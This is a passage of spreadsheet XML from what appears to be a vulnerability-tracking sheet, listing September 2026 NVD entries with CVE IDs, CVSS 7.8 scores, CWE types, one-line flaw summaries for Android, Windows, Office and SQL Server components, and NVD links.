s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G450" s="5" t="inlineStr" /><c r="H450" s="5" t="n"><v>0.001</v></c><c r="I450" s="5" t="inlineStr" /><c r="J450" s="5" t="inlineStr" /><c r="K450" s="5" t="inlineStr" /><c r="L450" s="5" t="inlineStr" /><c r="M450" s="5" t="inlineStr" /><c r="N450" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O450" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P450" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q450" s="5" t="inlineStr" /><c r="R450" s="5" t="inlineStr"><is><t>CWE-20</t></is></c><c r="S450" s="5" t="inlineStr"><is><t>In AppendCommentLine of AnnotationProcessor.cpp, there is a possible supply chain risk due to improper input validation. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="T450" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-55273</t></is></c></row><row r="451"><c r="A451" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B451" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C451" s="5" t="inlineStr"><is><t>CVE-2026-55285</t></is></c><c r="D451" s="5" t="n"><v>7.8</v></c><c r="E451" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F451" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G451" s="5" t="inlineStr" /><c r="H451" s="5" t="n"><v>0.001</v></c><c r="I451" s="5" t="inlineStr" /><c r="J451" s="5" t="inlineStr" /><c r="K451" s="5" t="inlineStr" /><c r="L451" s="5" t="inlineStr" /><c r="M451" s="5" t="inlineStr" /><c r="N451" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O451" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P451" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q451" s="5" t="inlineStr" /><c r="R451" s="5" t="inlineStr"><is><t>CWE-120</t></is></c><c r="S451" s="5" t="inlineStr"><is><t>In openLogicalChannel of multiple files, there is a possible out-of-bounds write due to a missing bounds check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="T451" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-55285</t></is></c></row><row r="452"><c r="A452" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B452" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C452" s="5" t="inlineStr"><is><t>CVE-2026-55294</t></is></c><c r="D452" s="5" t="n"><v>7.8</v></c><c r="E452" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F452" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G452" s="5" t="inlineStr" /><c r="H452" s="5" t="n"><v>0.001</v></c><c r="I452" s="5" t="inlineStr" /><c r="J452" s="5" t="inlineStr" /><c r="K452" s="5" t="inlineStr" /><c r="L452" s="5" t="inlineStr" /><c r="M452" s="5" t="inlineStr" /><c r="N452" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O452" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P452" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q452" s="5" t="inlineStr" /><c r="R452" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S452" s="5" t="inlineStr"><is><t>In ihevcd_get_tu_data_size of ihevcd_utils.c, there is a possible out of bounds write due to a heap buffer overflow. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="T452" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-55294</t></is></c></row><row r="453"><c r="A453" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B453" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C453" s="5" t="inlineStr"><is><t>CVE-2026-56172</t></is></c><c r="D453" s="5" t="n"><v>7.8</v></c><c r="E453" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F453" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G453" s="5" t="inlineStr" /><c r="H453" s="5" t="n"><v>0.003</v></c><c r="I453" s="5" t="inlineStr" /><c r="J453" s="5" t="inlineStr" /><c r="K453" s="5" t="inlineStr" /><c r="L453" s="5" t="inlineStr" /><c r="M453" s="5" t="inlineStr" /><c r="N453" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O453" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P453" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q453" s="5" t="inlineStr" /><c r="R453" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S453" s="5" t="inlineStr"><is><t>Use after free in Windows VHD miniport driver allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T453" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-56172</t></is></c></row><row r="454"><c r="A454" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B454" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C454" s="5" t="inlineStr"><is><t>CVE-2026-56177</t></is></c><c r="D454" s="5" t="n"><v>7.8</v></c><c r="E454" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F454" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G454" s="5" t="inlineStr" /><c r="H454" s="5" t="n"><v>0.003</v></c><c r="I454" s="5" t="inlineStr" /><c r="J454" s="5" t="inlineStr" /><c r="K454" s="5" t="inlineStr" /><c r="L454" s="5" t="inlineStr" /><c r="M454" s="5" t="inlineStr" /><c r="N454" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O454" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P454" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q454" s="5" t="inlineStr" /><c r="R454" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S454" s="5" t="inlineStr"><is><t>Use after free in Windows Server allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T454" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-56177</t></is></c></row><row r="455"><c r="A455" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B455" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C455" s="5" t="inlineStr"><is><t>CVE-2026-56198</t></is></c><c r="D455" s="5" t="n"><v>7.8</v></c><c r="E455" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F455" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G455" s="5" t="inlineStr" /><c r="H455" s="5" t="n"><v>0.002</v></c><c r="I455" s="5" t="inlineStr" /><c r="J455" s="5" t="inlineStr" /><c r="K455" s="5" t="inlineStr" /><c r="L455" s="5" t="inlineStr" /><c r="M455" s="5" t="inlineStr" /><c r="N455" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O455" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P455" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q455" s="5" t="inlineStr" /><c r="R455" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S455" s="5" t="inlineStr"><is><t>Out-of-bounds read in Microsoft Trace Data Helper allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T455" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-56198</t></is></c></row><row r="456"><c r="A456" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B456" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C456" s="5" t="inlineStr"><is><t>CVE-2026-5729</t></is></c><c r="D456" s="5" t="n"><v>7.8</v></c><c r="E456" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F456" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G456" s="5" t="inlineStr" /><c r="H456" s="5" t="n"><v>0.001</v></c><c r="I456" s="5" t="inlineStr" /><c r="J456" s="5" t="inlineStr" /><c r="K456" s="5" t="inlineStr" /><c r="L456" s="5" t="inlineStr" /><c r="M456" s="5" t="inlineStr" /><c r="N456" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O456" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P456" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q456" s="5" t="inlineStr" /><c r="R456" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S456" s="5" t="inlineStr"><is><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is></c><c r="T456" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-5729</t></is></c></row><row r="457"><c r="A457" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B457" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C457" s="5" t="inlineStr"><is><t>CVE-2026-58599</t></is></c><c r="D457" s="5" t="n"><v>7.8</v></c><c r="E457" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F457" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G457" s="5" t="inlineStr" /><c r="H457" s="5" t="n"><v>0.003</v></c><c r="I457" s="5" t="inlineStr" /><c r="J457" s="5" t="inlineStr" /><c r="K457" s="5" t="inlineStr" /><c r="L457" s="5" t="inlineStr" /><c r="M457" s="5" t="inlineStr" /><c r="N457" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O457" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P457" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q457" s="5" t="inlineStr" /><c r="R457" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S457" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Microsoft Windows Codecs Library allows an unauthorized attacker to execute code locally.</t></is></c><c r="T457" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-58599</t></is></c></row><row r="458"><c r="A458" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B458" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C458" s="5" t="inlineStr"><is><t>CVE-2026-58600</t></is></c><c r="D458" s="5" t="n"><v>7.8</v></c><c r="E458" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F458" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G458" s="5" t="inlineStr" /><c r="H458" s="5" t="n"><v>0.003</v></c><c r="I458" s="5" t="inlineStr" /><c r="J458" s="5" t="inlineStr" /><c r="K458" s="5" t="inlineStr" /><c r="L458" s="5" t="inlineStr" /><c r="M458" s="5" t="inlineStr" /><c r="N458" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O458" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P458" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q458" s="5" t="inlineStr" /><c r="R458" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S458" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Microsoft Windows Codecs Library allows an unauthorized attacker to elevate privileges locally.</t></is></c><c r="T458" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-58600</t></is></c></row><row r="459"><c r="A459" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B459" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C459" s="5" t="inlineStr"><is><t>CVE-2026-58611</t></is></c><c r="D459" s="5" t="n"><v>7.8</v></c><c r="E459" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F459" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G459" s="5" t="inlineStr" /><c r="H459" s="5" t="n"><v>0.002</v></c><c r="I459" s="5" t="inlineStr" /><c r="J459" s="5" t="inlineStr" /><c r="K459" s="5" t="inlineStr"><is><t>microsoft:xbox_gaming_services</t></is></c><c r="L459" s="5" t="inlineStr" /><c r="M459" s="5" t="inlineStr" /><c r="N459" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O459" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P459" s="5" t="inlineStr"><is><t>2026-09-14</t></is></c><c r="Q459" s="5" t="inlineStr" /><c r="R459" s="5" t="inlineStr"><is><t>CWE-285</t></is></c><c r="S459" s="5" t="inlineStr"><is><t>Improper authorization in XBox Gaming Services allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T459" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-58611</t></is></c></row><row r="460"><c r="A460" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B460" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C460" s="5" t="inlineStr"><is><t>CVE-2026-58820</t></is></c><c r="D460" s="5" t="n"><v>7.8</v></c><c r="E460" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F460" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G460" s="5" t="inlineStr" /><c r="H460" s="5" t="n"><v>0.001</v></c><c r="I460" s="5" t="inlineStr" /><c r="J460" s="5" t="inlineStr" /><c r="K460" s="5" t="inlineStr" /><c r="L460" s="5" t="inlineStr" /><c r="M460" s="5" t="inlineStr" /><c r="N460" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O460" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P460" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q460" s="5" t="inlineStr" /><c r="R460" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S460" s="5" t="inlineStr"><is><t>In multiple locations, there is a possible memory safety issue due to integer overflow. This could lead to local escalation of privilege with no additional execution privileges required.</t></is></c><c r="T460" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-58820</t></is></c></row><row r="461"><c r="A461" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B461" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C461" s="5" t="inlineStr"><is><t>CVE-2026-58823</t></is></c><c r="D461" s="5" t="n"><v>7.8</v></c><c r="E461" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F461" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G461" s="5" t="inlineStr" /><c r="H461" s="5" t="n"><v>0.001</v></c><c r="I461" s="5" t="inlineStr" /><c r="J461" s="5" t="inlineStr" /><c r="K461" s="5" t="inlineStr" /><c r="L461" s="5" t="inlineStr" /><c r="M461" s="5" t="inlineStr" /><c r="N461" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O461" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P461" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q461" s="5" t="inlineStr" /><c r="R461" s="5" t="inlineStr"><is><t>CWE-120</t></is></c><c r="S461" s="5" t="inlineStr"><is><t>In stpropnci_process_std of stpropnci_std.cc, there is a possible memory safety issue due to a missing bounds check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="T461" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-58823</t></is></c></row><row r="462"><c r="A462" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B462" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C462" s="5" t="inlineStr"><is><t>CVE-2026-58839</t></is></c><c r="D462" s="5" t="n"><v>7.8</v></c><c r="E462" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F462" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G462" s="5" t="inlineStr" /><c r="H462" s="5" t="n"><v>0.001</v></c><c r="I462" s="5" t="inlineStr" /><c r="J462" s="5" t="inlineStr" /><c r="K462" s="5" t="inlineStr" /><c r="L462" s="5" t="inlineStr" /><c r="M462" s="5" t="inlineStr" /><c r="N462" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O462" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P462" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q462" s="5" t="inlineStr" /><c r="R462" s="5" t="inlineStr"><is><t>CWE-120</t></is></c><c r="S462" s="5" t="inlineStr"><is><t>In forEachLine of MountRegistry.cpp, there is a possible out of bounds read due to a buffer overflow. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="T462" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-58839</t></is></c></row><row r="463"><c r="A463" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B463" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C463" s="5" t="inlineStr"><is><t>CVE-2026-58846</t></is></c><c r="D463" s="5" t="n"><v>7.8</v></c><c r="E463" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F463" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G463" s="5" t="inlineStr" /><c r="H463" s="5" t="n"><v>0.001</v></c><c r="I463" s="5" t="inlineStr" /><c r="J463" s="5" t="inlineStr" /><c r="K463" s="5" t="inlineStr" /><c r="L463" s="5" t="inlineStr" /><c r="M463" s="5" t="inlineStr" /><c r="N463" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O463" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P463" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q463" s="5" t="inlineStr" /><c r="R463" s="5" t="inlineStr"><is><t>CWE-269</t></is></c><c r="S463" s="5" t="inlineStr"><is><t>In kvm_iommu_map_sg of iommu.c, there is a possible use after free due to a missing permission check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="T463" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-58846</t></is></c></row><row r="464"><c r="A464" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B464" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C464" s="5" t="inlineStr"><is><t>CVE-2026-58874</t></is></c><c r="D464" s="5" t="n"><v>7.8</v></c><c r="E464" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F464" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G464" s="5" t="inlineStr" /><c r="H464" s="5" t="n"><v>0.001</v></c><c r="I464" s="5" t="inlineStr" /><c r="J464" s="5" t="inlineStr" /><c r="K464" s="5" t="inlineStr" /><c r="L464" s="5" t="inlineStr" /><c r="M464" s="5" t="inlineStr" /><c r="N464" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O464" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P464" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q464" s="5" t="inlineStr" /><c r="R464" s="5" t="inlineStr"><is><t>CWE-269</t></is></c><c r="S464" s="5" t="inlineStr"><is><t>In multiple functions of SmsController.java, there is a possible escalation of privilege due to a missing permission check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="T464" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-58874</t></is></c></row><row r="465"><c r="A465" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B465" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C465" s="5" t="inlineStr"><is><t>CVE-2026-58941</t></is></c><c r="D465" s="5" t="n"><v>7.8</v></c><c r="E465" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F465" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G465" s="5" t="inlineStr" /><c r="H465" s="5" t="n"><v>0.001</v></c><c r="I465" s="5" t="inlineStr" /><c r="J465" s="5" t="inlineStr" /><c r="K465" s="5" t="inlineStr" /><c r="L465" s="5" t="inlineStr" /><c r="M465" s="5" t="inlineStr" /><c r="N465" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O465" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P465" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q465" s="5" t="inlineStr" /><c r="R465" s="5" t="inlineStr"><is><t>CWE-20</t></is></c><c r="S465" s="5" t="inlineStr"><is><t>In multiple functions of iommu.c, there is a possible out of bounds read/write due to improper input validation. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="T465" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-58941</t></is></c></row><row r="466"><c r="A466" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B466" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C466" s="5" t="inlineStr"><is><t>CVE-2026-62697</t></is></c><c r="D466" s="5" t="n"><v>7.8</v></c><c r="E466" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F466" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G466" s="5" t="inlineStr" /><c r="H466" s="5" t="n"><v>0.003</v></c><c r="I466" s="5" t="inlineStr" /><c r="J466" s="5" t="inlineStr" /><c r="K466" s="5" t="inlineStr" /><c r="L466" s="5" t="inlineStr" /><c r="M466" s="5" t="inlineStr" /><c r="N466" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O466" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P466" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q466" s="5" t="inlineStr" /><c r="R466" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S466" s="5" t="inlineStr"><is><t>Use after free in Windows Push Notifications allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T466" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-62697</t></is></c></row><row r="467"><c r="A467" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B467" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C467" s="5" t="inlineStr"><is><t>CVE-2026-62804</t></is></c><c r="D467" s="5" t="n"><v>7.8</v></c><c r="E467" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F467" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G467" s="5" t="inlineStr" /><c r="H467" s="5" t="n"><v>0.003</v></c><c r="I467" s="5" t="inlineStr" /><c r="J467" s="5" t="inlineStr" /><c r="K467" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t></is></c><c r="L467" s="5" t="inlineStr" /><c r="M467" s="5" t="inlineStr" /><c r="N467" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O467" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P467" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q467" s="5" t="inlineStr" /><c r="R467" s="5" t="inlineStr"><is><t>CWE-73</t></is></c><c r="S467" s="5" t="inlineStr"><is><t>External control of file name or path in Microsoft Office Word allows an unauthorized attacker to execute code locally.</t></is></c><c r="T467" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-62804</t></is></c></row><row r="468"><c r="A468" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B468" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C468" s="5" t="inlineStr"><is><t>CVE-2026-62810</t></is></c><c r="D468" s="5" t="n"><v>7.8</v></c><c r="E468" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F468" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G468" s="5" t="inlineStr" /><c r="H468" s="5" t="n"><v>0.002</v></c><c r="I468" s="5" t="inlineStr" /><c r="J468" s="5" t="inlineStr" /><c r="K468" s="5" t="inlineStr" /><c r="L468" s="5" t="inlineStr" /><c r="M468" s="5" t="inlineStr" /><c r="N468" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O468" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P468" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q468" s="5" t="inlineStr" /><c r="R468" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S468" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Active Directory Certificate Services (AD CS) allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T468" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-62810</t></is></c></row><row r="469"><c r="A469" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B469" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C469" s="5" t="inlineStr"><is><t>CVE-2026-68787</t></is></c><c r="D469" s="5" t="n"><v>7.8</v></c><c r="E469" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F469" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G469" s="5" t="inlineStr" /><c r="H469" s="5" t="n"><v>0.002</v></c><c r="I469" s="5" t="inlineStr" /><c r="J469" s="5" t="inlineStr"><is><t>microsoft:sql_server</t></is></c><c r="K469" s="5" t="inlineStr"><is><t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t></is></c><c r="L469" s="5" t="inlineStr" /><c r="M469" s="5" t="inlineStr" /><c r="N469" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O469" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P469" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q469" s="5" t="inlineStr" /><c r="R469" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S469" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in SQL Server allows an authorized attacker to execute code locally.</t></is></c><c r="T469" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-68787</t></is></c></row><row r="470"><c r="A470" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B470" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C470" s="5" t="inlineStr"><is><t>CVE-2026-68832</t></is></c><c r="D470" s="5" t="n"><v>7.8</v></c><c r="E470" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F470" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G470" s="5" t="inlineStr" /><c r="H470" s="5" t="n"><v>0.002</v></c><c r="I470" s="5" t="inlineStr" /><c r="J470" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K47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0" s="5" t="inlineStr" /><c r="M470" s="5" t="inlineStr" /><c r="N470" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O470" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P470" s="5" t="inlineStr"><is><t>2026-09-14</t></is></c><c r="Q470" s="5" t="inlineStr" /><c r="R470" s="5" t="inlineStr"><is><t>CWE-190</t></is></c><c r="S470" s="5" t="inlineStr"><is><t>Integer overflow or wraparound in Windows NTFS allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T470" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-68832</t></is></c></row><row r="471"><c r="A471" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B471" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C471" s="5" t="inlineStr"><is><t>CVE-2026-68841</t></is></c><c r="D471" s="5" t="n"><v>7.8</v></c><c r="E471" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F471" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G471" s="5" t="inlineStr" /><c r="H471" s="5" t="n"><v>0.002</v></c><c r="I471" s="5" t="inlineStr" /><c r="J471" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K4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1" s="5" t="inlineStr" /><c r="M471" s="5" t="inlineStr" /><c r="N471" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O471" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P471" s="5" t="inlineStr"><is><t>2026-09-14</t></is></c><c r="Q471" s="5" t="inlineStr" /><c r="R471" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S471" s="5" t="inlineStr"><is><t>Heap-based</t></is></c><c r="T471" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-68841</t></is></c></row><row r="472"><c r="A472" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B472" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C472" s="5" t="inlineStr"><is><t>CVE-2026-68844</t></is></c><c r="D472" s="5" t="n"><v>7.8</v></c><c r="E472" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F472" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G472" s="5" t="inlineStr" /><c r="H472" s="5" t="n"><v>0.003</v></c><c r="I472" s="5" t="inlineStr" /><c r="J472" s="5" t="inlineStr" /><c r="K472" s="5" t="inlineStr" /><c r="L472" s="5" t="inlineStr" /><c r="M472" s="5" t="inlineStr" /><c r="N472" s="5" 